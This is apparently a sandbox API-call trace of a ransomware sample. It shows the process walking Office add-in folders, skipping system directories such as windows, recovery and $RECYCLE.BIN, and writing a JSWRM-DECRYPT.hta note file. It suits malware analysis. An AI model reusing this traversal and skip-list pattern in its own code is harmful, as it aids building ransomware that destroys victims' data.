[0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.408] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42b29f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.408] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.408] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.409] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5a3ee57, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a3ee57, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.409] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.409] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5a3ee57, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5a3ee57, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.409] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0123.409] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="sv", cAlternateFileName="")) returned 1 [0123.409] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="...") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="windows") returned -1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="recovery") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="perflogs") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="documents and settings") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="$RECYCLE.BIN") returned 1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="system volume information") returned -1 [0123.410] lstrcmpiW (lpString1="sv", lpString2="msocache") returned 1 [0123.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sv\\jswrm-decrypt.hta")) returned 0xffffffff [0123.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.411] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.412] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.412] CloseHandle (hObject=0x338) returned 1 [0123.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sv\\jswrm-decrypt.hta")) returned 0x20 [0123.413] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sv\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0123.413] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.413] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.413] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.413] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.413] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4038a745, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4038a745, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4038a745, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.413] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.413] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa25d2ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa25d2ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.413] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.413] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.413] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.414] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1698075, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1698075, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.414] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6297232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6297232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6297232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.414] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.415] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.415] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, 